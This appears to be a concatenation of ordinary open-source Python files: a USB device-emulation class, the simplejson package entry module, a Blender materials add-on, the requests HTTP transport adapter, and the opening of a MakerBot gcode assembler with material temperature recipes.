  def ClassControlRead(self, recipient, request, value, index, length):
    """Handle class-specific control transfers.
    This function should be overridden by a subclass implementing a particular
    device class.
    Args:
      recipient: Request recipient (device, interface, endpoint, etc.)
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      length: Maximum amount of data the host expects the device to return.
    Returns:
      A buffer to return to the USB host with len <= length on success or
      None to stall the pipe.
    """
    _ = recipient, request, value, index, length
    return None
  def VendorControlRead(self, recipient, request, value, index, length):
    """Handle vendor-specific control transfers.
    This function should be overridden by a subclass if implementing a device
    that responds to vendor-specific requests.
    Args:
      recipient: Request recipient (device, interface, endpoint, etc.)
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      length: Maximum amount of data the host expects the device to return.
    Returns:
      A buffer to return to the USB host with len <= length on success or
      None to stall the pipe.
    """
    _ = recipient, request, value, index, length
    return None
  def StandardControlWrite(self, recipient, request, value, index, data):
    """Handle standard control transfers.
    Args:
      recipient: Request recipient (device, interface, endpoint, etc.)
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      data: Data stage of the request.
    Returns:
      True on success, None to stall the pipe.
    """
    _ = data
    if request == usb_constants.Request.SET_CONFIGURATION:
      if recipient == usb_constants.Recipient.DEVICE:
        return self.SetConfiguration(value)
    elif request == usb_constants.Request.SET_INTERFACE:
      if recipient == usb_constants.Recipient.INTERFACE:
        # wIndex selects the interface, wValue the alternate setting.
        return self.SetInterface(index, value)
  def ClassControlWrite(self, recipient, request, value, index, data):
    """Handle class-specific control transfers.
    This function should be overridden by a subclass implementing a particular
    device class.
    Args:
      recipient: Request recipient (device, interface, endpoint, etc.)
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      data: Data stage of the request.
    Returns:
      True on success, None to stall the pipe.
    """
    _ = recipient, request, value, index, data
    return None
  def VendorControlWrite(self, recipient, request, value, index, data):
    """Handle vendor-specific control transfers.
    This function should be overridden by a subclass if implementing a device
    that responds to vendor-specific requests.
    Args:
      recipient: Request recipient (device, interface, endpoint, etc.)
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      data: Data stage of the request.
    Returns:
      True on success, None to stall the pipe.
    """
    _ = recipient, request, value, index, data
    return None
  def GetStringDescriptor(self, index, lang, length):
    """Handle a GET_DESCRIPTOR(String) request from the host.
    Descriptor index 0 returns the set of languages supported by the device.
    All other indices return the string descriptors registered with those
    indices.
    See Universal Serial Bus Specification Revision 2.0 section 9.6.7.
    Args:
      index: Descriptor index.
      lang: Descriptor language code.
      length: Maximum amount of data the host expects the device to return.
    Returns:
      The string descriptor or None to stall the pipe if the descriptor is not
      found.
    """
    if index == 0:
      # Language table: bLength, bDescriptorType, then one 16-bit language
      # code per registered language.
      # NOTE(review): this rebinds the 'length' parameter, so the final
      # slice no longer truncates to the host-requested length -- confirm
      # the controller layer enforces the cap.
      length = 2 + len(self._strings) * 2
      header = struct.pack('<BB', length, usb_constants.DescriptorType.STRING)
      lang_codes = [struct.pack('<H', lang)
                    for lang in self._strings.iterkeys()]
      buf = header + ''.join(lang_codes)
      assert len(buf) == length
      return buf[:length]
    elif lang not in self._strings:
      return None
    elif index not in self._strings[lang]:
      return None
    else:
      # String descriptors carry UTF-16LE payloads per the USB spec.
      string = self._strings[lang][index].encode('UTF-16LE')
      header = struct.pack(
          '<BB', 2 + len(string), usb_constants.DescriptorType.STRING)
      buf = header + string
      return buf[:length]
  def SetConfiguration(self, index):
    """Handle a SET_CONFIGURATION request from the host.
    See Universal Serial Bus Specification Revision 2.0 section 9.4.7.
    Args:
      index: Configuration index selected.
    Returns:
      True on success, None on error to stall the pipe.
    """
    print 'SetConfiguration({})'.format(index)
    # Tear down every currently active endpoint before (re)configuring.
    for endpoint_addrs in self._active_endpoints.values():
      for endpoint_addr in endpoint_addrs:
        self._chip.StopEndpoint(endpoint_addr)
      endpoint_addrs.clear()
    if index == 0:
      # SET_CONFIGURATION(0) puts the device into the Address state which
      # Windows does before suspending the port.
      return True
    elif index != 1:
      # Only a single configuration (index 1) is supported.
      return None
    # Start the endpoints of every interface's default (alt 0) setting.
    config_desc = self.GetConfigurationDescriptor()
    for interface_desc in config_desc.GetInterfaces():
      if interface_desc.bAlternateSetting != 0:
        continue
      endpoint_addrs = self._active_endpoints.setdefault(
          interface_desc.bInterfaceNumber, set())
      for endpoint_desc in interface_desc.GetEndpoints():
        self._chip.StartEndpoint(endpoint_desc)
        endpoint_addrs.add(endpoint_desc.bEndpointAddress)
    return True
  def SetInterface(self, interface, alt_setting):
    """Handle a SET_INTERFACE request from the host.
    See Universal Serial Bus Specification Revision 2.0 section 9.4.10.
    Args:
      interface: Interface number to configure.
      alt_setting: Alternate setting to select.
    Returns:
      True on success, None on error to stall the pipe.
    """
    print 'SetInterface({}, {})'.format(interface, alt_setting)
    config_desc = self.GetConfigurationDescriptor()
    interface_desc = None
    for interface_option in config_desc.GetInterfaces():
      if (interface_option.bInterfaceNumber == interface and
          interface_option.bAlternateSetting == alt_setting):
        interface_desc = interface_option
    if interface_desc is None:
      return None
    # Stop the endpoints of the previous setting, then start the new ones.
    # NOTE(review): the set is not cleared between stop and start, so
    # addresses absent from the new alt setting linger -- confirm intended.
    endpoint_addrs = self._active_endpoints.setdefault(interface, set())
    for endpoint_addr in endpoint_addrs:
      self._chip.StopEndpoint(endpoint_addr)
    for endpoint_desc in interface_desc.GetEndpoints():
      self._chip.StartEndpoint(endpoint_desc)
      endpoint_addrs.add(endpoint_desc.bEndpointAddress)
    return True
| bsd-3-clause |
bcherry/adequatelygood | utils/external/simplejson/__init__.py | 55 | 13802 | r"""
A simple, fast, extensible JSON encoder and decoder
JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
simplejson exposes an API familiar to users of the standard library
marshal and pickle modules.
Encoding basic Python object hierarchies::
>>> import simplejson
>>> simplejson.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print simplejson.dumps("\"foo\bar")
"\"foo\bar"
>>> print simplejson.dumps(u'\u1234')
"\u1234"
>>> print simplejson.dumps('\\')
"\\"
>>> print simplejson.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> simplejson.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson
>>> simplejson.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson
>>> print simplejson.dumps({'4': 5, '6': 7}, sort_keys=True, indent=4)
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson
>>> simplejson.loads('["foo", {"bar":["baz", null, 1.0, 2]}]')
[u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> simplejson.loads('"\\"foo\\bar"')
u'"foo\x08ar'
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> simplejson.load(io)
[u'streaming API']
Specializing JSON object decoding::
>>> import simplejson
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> simplejson.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> import decimal
>>> simplejson.loads('1.1', parse_float=decimal.Decimal)
Decimal("1.1")
Extending JSONEncoder::
>>> import simplejson
>>> class ComplexEncoder(simplejson.JSONEncoder):
... def default(self, obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... return simplejson.JSONEncoder.default(self, obj)
...
>>> dumps(2 + 1j, cls=ComplexEncoder)
'[2.0, 1.0]'
>>> ComplexEncoder().encode(2 + 1j)
'[2.0, 1.0]'
>>> list(ComplexEncoder().iterencode(2 + 1j))
['[', '2.0', ', ', '1.0', ']']
Using simplejson from the shell to validate and
pretty-print::
$ echo '{"json":"obj"}' | python -msimplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -msimplejson.tool
Expecting property name: line 1 column 2 (char 2)
Note that the JSON produced by this module's default settings
is a subset of YAML, so it may be used as a serializer for that as well.
"""
__version__ = '1.9.2'
__all__ = [
    'dump', 'dumps', 'load', 'loads',
    'JSONDecoder', 'JSONEncoder',
]
if __name__ == '__main__':
    import warnings
    # Fixed typo in the user-facing message: "-msiplejson" -> "-msimplejson".
    warnings.warn('python -msimplejson is deprecated, use python -msimplejson.tool', DeprecationWarning)
    # When run as a script, the package must be imported absolutely.
    from simplejson.decoder import JSONDecoder
    from simplejson.encoder import JSONEncoder
else:
    # Python 2 implicit relative imports, used on a normal package import.
    from decoder import JSONDecoder
    from encoder import JSONEncoder
# Shared encoder used by dump()/dumps() when every option is left at its
# default, so the common case avoids constructing a new encoder per call.
_default_encoder = JSONEncoder(
    skipkeys=False,
    ensure_ascii=True,
    check_circular=True,
    allow_nan=True,
    indent=None,
    separators=None,
    encoding='utf-8',
    default=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
        allow_nan=True, cls=None, indent=None, separators=None,
        encoding='utf-8', default=None, **kw):
    """Serialize ``obj`` as a JSON formatted stream to ``fp``.

    ``fp`` must be a ``.write()``-supporting file-like object.  The options
    mirror ``dumps()``:

    - ``skipkeys``: skip ``dict`` keys that are not of a basic type
      (``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``,
      ``None``) instead of raising ``TypeError``.
    - ``ensure_ascii``: when ``False``, some chunks written to ``fp`` may be
      ``unicode`` instances, so ``fp.write()`` must understand ``unicode``
      (as in ``codecs.getwriter()``) or an error is likely.
    - ``check_circular``: when ``False``, the circular reference check for
      container types is skipped and a circular reference will result in an
      ``OverflowError`` (or worse).
    - ``allow_nan``: when ``False``, serializing out of range ``float``
      values (``nan``, ``inf``, ``-inf``) raises ``ValueError`` in strict
      compliance of the JSON specification, instead of using the JavaScript
      equivalents (``NaN``, ``Infinity``, ``-Infinity``).
    - ``indent``: a non-negative integer pretty-prints with that indent
      level; 0 only inserts newlines; ``None`` is the most compact form.
    - ``separators``: an ``(item_separator, dict_separator)`` tuple used
      instead of the default ``(', ', ': ')``; ``(',', ':')`` is the most
      compact JSON representation.
    - ``encoding``: character encoding for ``str`` instances, default UTF-8.
    - ``default``: ``default(obj)`` should return a serializable version of
      ``obj`` or raise ``TypeError``; the default simply raises ``TypeError``.
    - ``cls``: a custom ``JSONEncoder`` subclass (e.g. one that overrides
      ``.default()`` to serialize additional types).
    """
    all_defaults = (skipkeys is False and ensure_ascii is True and
                    check_circular is True and allow_nan is True and
                    cls is None and indent is None and separators is None and
                    encoding == 'utf-8' and default is None and not kw)
    if all_defaults:
        # Fast path: reuse the shared module-level encoder.
        chunks = _default_encoder.iterencode(obj)
    else:
        encoder_cls = JSONEncoder if cls is None else cls
        encoder = encoder_cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
                              check_circular=check_circular,
                              allow_nan=allow_nan, indent=indent,
                              separators=separators, encoding=encoding,
                              default=default, **kw)
        chunks = encoder.iterencode(obj)
    # Stream chunk by chunk; writelines() could be faster on some versions
    # of Python, at a debuggability cost.
    write = fp.write
    for chunk in chunks:
        write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
        allow_nan=True, cls=None, indent=None, separators=None,
        encoding='utf-8', default=None, **kw):
    """Serialize ``obj`` to a JSON formatted ``str``.

    Options:

    - ``skipkeys``: skip ``dict`` keys that are not of a basic type
      (``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``,
      ``None``) instead of raising ``TypeError``.
    - ``ensure_ascii``: when ``False``, the return value is a ``unicode``
      instance subject to normal Python ``str`` to ``unicode`` coercion
      rules instead of being escaped to an ASCII ``str``.
    - ``check_circular``: when ``False``, the circular reference check for
      container types is skipped and a circular reference will result in an
      ``OverflowError`` (or worse).
    - ``allow_nan``: when ``False``, serializing out of range ``float``
      values (``nan``, ``inf``, ``-inf``) raises ``ValueError`` in strict
      compliance of the JSON specification, instead of using the JavaScript
      equivalents (``NaN``, ``Infinity``, ``-Infinity``).
    - ``indent``: a non-negative integer pretty-prints with that indent
      level; 0 only inserts newlines; ``None`` is the most compact form.
    - ``separators``: an ``(item_separator, dict_separator)`` tuple used
      instead of the default ``(', ', ': ')``; ``(',', ':')`` is the most
      compact JSON representation.
    - ``encoding``: character encoding for ``str`` instances, default UTF-8.
    - ``default``: ``default(obj)`` should return a serializable version of
      ``obj`` or raise ``TypeError``; the default simply raises ``TypeError``.
    - ``cls``: a custom ``JSONEncoder`` subclass (e.g. one that overrides
      ``.default()`` to serialize additional types).
    """
    all_defaults = (skipkeys is False and ensure_ascii is True and
                    check_circular is True and allow_nan is True and
                    cls is None and indent is None and separators is None and
                    encoding == 'utf-8' and default is None and not kw)
    if all_defaults:
        # Fast path: every option is at its default; reuse the shared encoder.
        return _default_encoder.encode(obj)
    encoder_cls = JSONEncoder if cls is None else cls
    return encoder_cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
                       check_circular=check_circular, allow_nan=allow_nan,
                       indent=indent, separators=separators,
                       encoding=encoding, default=default,
                       **kw).encode(obj)
# Shared decoder used by load()/loads() when all arguments are left at their
# defaults, avoiding a new JSONDecoder per call.
_default_decoder = JSONDecoder(encoding=None, object_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
        parse_int=None, parse_constant=None, **kw):
    """
    Deserialize ``fp`` (a ``.read()``-supporting file-like object holding a
    JSON document) to a Python object.

    If the contents of ``fp`` use an ASCII-based encoding other than utf-8
    (e.g. latin-1), pass the appropriate ``encoding`` name. Non-ASCII-based
    encodings (such as UCS-2) are not allowed; wrap the file with
    ``codecs.getreader(fp)(encoding)`` or decode to ``unicode`` yourself and
    call ``loads()`` instead.

    ``object_hook``, if given, is called with the result of every object
    literal decode (a ``dict``); its return value replaces the ``dict``.
    This enables custom decoders (e.g. JSON-RPC class hinting).

    A custom ``JSONDecoder`` subclass may be supplied via the ``cls`` kwarg.
    """
    # Read the whole document and delegate all option handling to loads().
    document = fp.read()
    return loads(document, encoding=encoding, cls=cls,
                 object_hook=object_hook, parse_float=parse_float,
                 parse_int=parse_int, parse_constant=parse_constant, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
        parse_int=None, parse_constant=None, **kw):
    """
    Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
    document) to a Python object.

    If ``s`` is a ``str`` encoded with an ASCII-based encoding other than
    utf-8 (e.g. latin-1), pass the appropriate ``encoding`` name. Encodings
    that are not ASCII based (such as UCS-2) are not allowed; decode to
    ``unicode`` first.

    ``object_hook``, if given, is called with the result of every object
    literal decode (a ``dict``); its return value replaces the ``dict``.

    ``parse_float``, ``parse_int`` and ``parse_constant``, if given, are
    called with the string form of every JSON float, int, or constant
    (``-Infinity``, ``Infinity``, ``NaN``, ``null``, ``true``, ``false``)
    respectively, allowing alternate numeric types or strict validation.

    A custom ``JSONDecoder`` subclass may be supplied via the ``cls`` kwarg.
    """
    # Fast path: an all-default call can reuse the shared module decoder.
    all_defaults = (cls is None and encoding is None and object_hook is None
                    and parse_int is None and parse_float is None
                    and parse_constant is None and not kw)
    if all_defaults:
        return _default_decoder.decode(s)
    if cls is None:
        cls = JSONDecoder
    # Forward only the hooks the caller actually supplied.
    optional_hooks = (
        ('object_hook', object_hook),
        ('parse_float', parse_float),
        ('parse_int', parse_int),
        ('parse_constant', parse_constant),
    )
    for hook_name, hook in optional_hooks:
        if hook is not None:
            kw[hook_name] = hook
    return cls(encoding=encoding, **kw).decode(s)
#
# Compatibility cruft from other libraries
#
def decode(s):
    """
    Deprecated alias for ``loads(s)``, kept for demjson / python-cjson
    API compatibility.
    """
    import warnings
    message = "simplejson.loads(s) should be used instead of decode(s)"
    warnings.warn(message, DeprecationWarning)
    return loads(s)
def encode(obj):
    """
    Deprecated alias for ``dumps(obj)``, kept for demjson / python-cjson
    API compatibility.
    """
    import warnings
    message = "simplejson.dumps(s) should be used instead of encode(s)"
    warnings.warn(message, DeprecationWarning)
    return dumps(obj)
def read(s):
    """
    Deprecated alias for ``loads(s)``, kept for jsonlib / JsonUtils /
    python-json / json-py API compatibility.
    """
    import warnings
    message = "simplejson.loads(s) should be used instead of read(s)"
    warnings.warn(message, DeprecationWarning)
    return loads(s)
def write(obj):
    """
    Deprecated alias for ``dumps(obj)``, kept for jsonlib / JsonUtils /
    python-json / json-py API compatibility.
    """
    import warnings
    message = "simplejson.dumps(s) should be used instead of write(s)"
    warnings.warn(message, DeprecationWarning)
    return dumps(obj)
# When executed directly, delegate to the simplejson.tool command-line
# pretty-printer.
if __name__ == '__main__':
    import simplejson.tool
    simplejson.tool.main()
| mit |
Passtechsoft/TPEAlpGen | blender/release/scripts/addons_contrib/automat/__init__.py | 2 | 1958 | # Copyright 2015 Théo Friberg under GNU GPL 3
# Add-on metadata read by Blender when scanning and enabling the add-on;
# shown in the User Preferences add-on list.
bl_info = {
    "name": "Cycles Automatic Materials",
    "author": "Théo Friberg",
    "blender": (2, 70, 0),
    "version": (0, 39),
    "location": "Space > Automatic / Adjustable Material from Image",
    "description": "One-click material setup from texture for Cycles. Blur from b°wide node pack.",
    "warning": "Still a work in progress",
    "wiki_url": "",
    "tracker_url": "mailto:theo.friberg@gmail.com?subject="
    "Bug report for Cycles Automatic Materials addon&body="
    "I have come across the following error while using the Cycles automatic"
    " materials addon (Please explain both the symptoms of the error and"
    " what you were doing when the error occured. If you think a specific"
    " action of yours is related to the error, please include a description"
    " of it too.):",
    "support": "COMMUNITY",
    "category": "Render"}
if "bpy" in locals():
import importlib
importlib.reload(JSONOps)
importlib.reload(AutoOp)
importlib.reload(AdjOp)
else:
from . import JSONOps
from . import AutoOp
from . import AdjOp
import bpy
import json
import os
def menu_draw(self, context):
    """Draw the automatic-material operator entry into a Blender menu."""
    layout = self.layout
    layout.operator("com.new_automat",
                    text="Automatic Material from Image",
                    icon="FILE_IMAGE")
def register():
    """Register the add-on's operators and hook the File > Import menu.

    Called by Blender when the add-on is enabled.
    """
    bpy.utils.register_class(AutoOp.AutomatOperatorFromTexture)
    bpy.utils.register_class(AdjOp.AdjustableOperatorFromTexture)
    # Also expose the operator as an entry in the import menu.
    bpy.types.INFO_MT_file_import.append(menu_draw)
def unregister():
    """Remove the import-menu entry and unregister the add-on's operators.

    Called by Blender when the add-on is disabled; mirrors register().
    """
    # Remove the menu hook first, then unregister the operator classes.
    bpy.types.INFO_MT_file_import.remove(menu_draw)
    bpy.utils.unregister_class(AutoOp.AutomatOperatorFromTexture)
    bpy.utils.unregister_class(AdjOp.AdjustableOperatorFromTexture)
# Run register() when the file is executed from Blender's text editor.
if __name__ == "__main__":
    register()
| gpl-3.0 |
lucashmorais/x-Bench | mozmill-env/python/Lib/site-packages/requests/adapters.py | 58 | 12272 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, ProxyManager
from .packages.urllib3.response import HTTPResponse
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError
from .auth import _basic_auth_str
# Defaults handed to the underlying urllib3 PoolManager.
DEFAULT_POOLBLOCK = False  # do not block when the pool is exhausted
DEFAULT_POOLSIZE = 10      # number of pools / connections per pool
DEFAULT_RETRIES = 0        # no automatic retries
class BaseAdapter(object):
    """The Base Transport Adapter.

    Defines the interface every transport adapter must implement;
    concrete subclasses override ``send`` and ``close``.
    """

    def __init__(self):
        super(BaseAdapter, self).__init__()

    def send(self):
        """Dispatch a request; must be overridden by subclasses."""
        raise NotImplementedError

    def close(self):
        """Release held resources; must be overridden by subclasses."""
        raise NotImplementedError
class HTTPAdapter(BaseAdapter):
    """The built-in HTTP Adapter for urllib3.
    Provides a general-case interface for Requests sessions to contact HTTP and
    HTTPS urls by implementing the Transport Adapter interface. This class will
    usually be created by the :class:`Session <Session>` class under the
    covers.
    :param pool_connections: The number of urllib3 connection pools to cache.
    :param pool_maxsize: The maximum number of connections to save in the pool.
    :param max_retries: The maximum number of retries each connection should attempt.
    :param pool_block: Whether the connection pool should block for connections.
    Usage::
      >>> import requests
      >>> s = requests.Session()
      >>> a = requests.adapters.HTTPAdapter()
      >>> s.mount('http://', a)
    """
    # Attributes captured by __getstate__ for pickling; the PoolManager is
    # deliberately excluded and rebuilt on unpickling.
    __attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
                 '_pool_block']
    def __init__(self, pool_connections=DEFAULT_POOLSIZE,
                 pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
                 pool_block=DEFAULT_POOLBLOCK):
        self.max_retries = max_retries
        self.config = {}  # legacy attribute; preserved via __attrs__
        super(HTTPAdapter, self).__init__()
        self._pool_connections = pool_connections
        self._pool_maxsize = pool_maxsize
        self._pool_block = pool_block
        self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
    def __getstate__(self):
        return dict((attr, getattr(self, attr, None)) for attr in
                    self.__attrs__)
    def __setstate__(self, state):
        for attr, value in state.items():
            setattr(self, attr, value)
        # The PoolManager is not part of __attrs__; recreate it from the
        # restored pool configuration.
        self.init_poolmanager(self._pool_connections, self._pool_maxsize,
                              block=self._pool_block)
    def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK):
        """Initializes a urllib3 PoolManager. This method should not be called
        from user code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param connections: The number of urllib3 connection pools to cache.
        :param maxsize: The maximum number of connections to save in the pool.
        :param block: Block when no free connections are available.
        """
        # save these values for pickling
        self._pool_connections = connections
        self._pool_maxsize = maxsize
        self._pool_block = block
        self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
                                       block=block)
    def cert_verify(self, conn, url, verify, cert):
        """Verify a SSL certificate. This method should not be called from user
        code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param conn: The urllib3 connection object associated with the cert.
        :param url: The requested URL.
        :param verify: Whether we should actually verify the certificate.
        :param cert: The SSL certificate to verify.
        """
        if url.startswith('https') and verify:
            cert_loc = None
            # Allow self-specified cert location.
            if verify is not True:
                cert_loc = verify
            if not cert_loc:
                cert_loc = DEFAULT_CA_BUNDLE_PATH
            if not cert_loc:
                raise Exception("Could not find a suitable SSL CA certificate bundle.")
            conn.cert_reqs = 'CERT_REQUIRED'
            conn.ca_certs = cert_loc
        else:
            conn.cert_reqs = 'CERT_NONE'
            conn.ca_certs = None
        if cert:
            # A (cert, key) pair or a single combined cert file.
            if not isinstance(cert, basestring):
                conn.cert_file = cert[0]
                conn.key_file = cert[1]
            else:
                conn.cert_file = cert
    def build_response(self, req, resp):
        """Builds a :class:`Response <requests.Response>` object from a urllib3
        response. This should not be called from user code, and is only exposed
        for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
        :param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
        :param resp: The urllib3 response object.
        """
        response = Response()
        # Fallback to None if there's no status_code, for whatever reason.
        response.status_code = getattr(resp, 'status', None)
        # Make headers case-insensitive.
        response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
        # Set encoding.
        response.encoding = get_encoding_from_headers(response.headers)
        response.raw = resp
        response.reason = response.raw.reason
        if isinstance(req.url, bytes):
            response.url = req.url.decode('utf-8')
        else:
            response.url = req.url
        # Add new cookies from the server.
        extract_cookies_to_jar(response.cookies, req, resp)
        # Give the Response some context.
        response.request = req
        response.connection = self
        return response
    def get_connection(self, url, proxies=None):
        """Returns a urllib3 connection for the given URL. This should not be
        called from user code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param url: The URL to connect to.
        :param proxies: (optional) A Requests-style dictionary of proxies used on this request.
        """
        proxies = proxies or {}
        proxy = proxies.get(urlparse(url).scheme)
        if proxy:
            proxy = prepend_scheme_if_needed(proxy, urlparse(url).scheme)
            conn = ProxyManager(self.poolmanager.connection_from_url(proxy))
        else:
            conn = self.poolmanager.connection_from_url(url)
        return conn
    def close(self):
        """Disposes of any internal state.
        Currently, this just closes the PoolManager, which closes pooled
        connections.
        """
        self.poolmanager.clear()
    def request_url(self, request, proxies):
        """Obtain the url to use when making the final request.
        If the message is being sent through a proxy, the full URL has to be
        used. Otherwise, we should only use the path portion of the URL.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param proxies: A dictionary of schemes to proxy URLs.
        """
        proxies = proxies or {}
        proxy = proxies.get(urlparse(request.url).scheme)
        if proxy:
            url, _ = urldefrag(request.url)
        else:
            url = request.path_url
        return url
    def add_headers(self, request, **kwargs):
        """Add any headers needed by the connection. Currently this adds a
        Proxy-Authorization header.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
        :param kwargs: The keyword arguments from the call to send().
        """
        proxies = kwargs.get('proxies', {})
        if proxies is None:
            proxies = {}
        proxy = proxies.get(urlparse(request.url).scheme)
        username, password = get_auth_from_url(proxy)
        if username and password:
            # Proxy auth usernames and passwords will be urlencoded, we need
            # to decode them.
            username = unquote(username)
            password = unquote(password)
            request.headers['Proxy-Authorization'] = _basic_auth_str(username,
                                                                     password)
    def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
        """Sends PreparedRequest object. Returns Response object.
        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param stream: (optional) Whether to stream the request content.
        :param timeout: (optional) The timeout on the request.
        :param verify: (optional) Whether to verify SSL certificates.
        :param cert: (optional) Any user-provided SSL certificate to be trusted.
        :param proxies: (optional) The proxies dictionary to apply to the request.
        """
        conn = self.get_connection(request.url, proxies)
        self.cert_verify(conn, request.url, verify, cert)
        url = self.request_url(request, proxies)
        self.add_headers(request, proxies=proxies)
        # A body with no Content-Length header is sent chunked.
        chunked = not (request.body is None or 'Content-Length' in request.headers)
        try:
            if not chunked:
                resp = conn.urlopen(
                    method=request.method,
                    url=url,
                    body=request.body,
                    headers=request.headers,
                    redirect=False,
                    assert_same_host=False,
                    preload_content=False,
                    decode_content=False,
                    retries=self.max_retries,
                    timeout=timeout
                )
            # Send the request.
            else:
                # Hand-roll HTTP chunked transfer encoding over the raw
                # low-level connection.
                if hasattr(conn, 'proxy_pool'):
                    conn = conn.proxy_pool
                low_conn = conn._get_conn(timeout=timeout)
                low_conn.putrequest(request.method, url, skip_accept_encoding=True)
                for header, value in request.headers.items():
                    low_conn.putheader(header, value)
                low_conn.endheaders()
                for i in request.body:
                    low_conn.send(hex(len(i))[2:].encode('utf-8'))
                    low_conn.send(b'\r\n')
                    low_conn.send(i)
                    low_conn.send(b'\r\n')
                low_conn.send(b'0\r\n\r\n')
                r = low_conn.getresponse()
                resp = HTTPResponse.from_httplib(r,
                    pool=conn,
                    connection=low_conn,
                    preload_content=False,
                    decode_content=False
                )
        except socket.error as sockerr:
            raise ConnectionError(sockerr)
        except MaxRetryError as e:
            raise ConnectionError(e)
        except (_SSLError, _HTTPError) as e:
            if isinstance(e, _SSLError):
                raise SSLError(e)
            elif isinstance(e, TimeoutError):
                raise Timeout(e)
            else:
                raise
        r = self.build_response(request, resp)
        if not stream:
            # Eagerly consume the body so the connection can be reused.
            r.content
        return r
| mit |
abinashk-inf/AstroBox | src/ext/makerbot_driver/GcodeAssembler.py | 6 | 7063 | from __future__ import absolute_import
import json
import makerbot_driver
"""
A machine profile object that holds all values for a specific profile.
"""
import json
import os
import re
import logging
# Built-in sequence recipes, keyed by material name (plus "dualstrusion"
# for two-toolhead prints).  Each recipe names the routines to select from
# the machine profile's start/end templates and supplies default
# temperature variables for the gcode processor.
GcodeRecipes = {
    "PLA" : {
        "print_start_sequence" : {
            "heat_platform" : "no_heat"
        },
        "print_end_sequence" : {
            "cool_platform" : "no_cool"
        },
        "variables" : {
            "TOOL_0_TEMP" : 230,
            "TOOL_1_TEMP" : 230
        }
    },
    "ABS" : {
        "print_start_sequence" : {
            "heat_platform" : "heat_platform"
        },
        "print_end_sequence" : {
            "cool_platform" : "cool_platform"
        },
        "variables" : {
            "TOOL_0_TEMP" : 230,
            "TOOL_1_TEMP" : 230,
            "PLATFORM_TEMP" : 110
        }
    },
    "dualstrusion": {
        "print_start_sequence" : {
            "heat_tools" : "dualstrusion"
        },
        "print_end_sequence" : {
            "cool_tools" : "dualstrusion"
        },
        "variables" : {}
    }
}
class GcodeAssembler(object):
    """
    An assembler that builds start and end gcode sequences.

    A recipe maps each routine slot (e.g. ``heat_platform``) to the name of
    a routine defined in the machine profile's start/end templates; the
    assembler stitches the selected routines together in a fixed order.
    """
    def __init__(self, machine_profile, profiledir=None):
        """
        :param machine_profile: Profile whose ``values`` mapping holds the
            ``print_start_sequence``/``print_end_sequence`` templates.
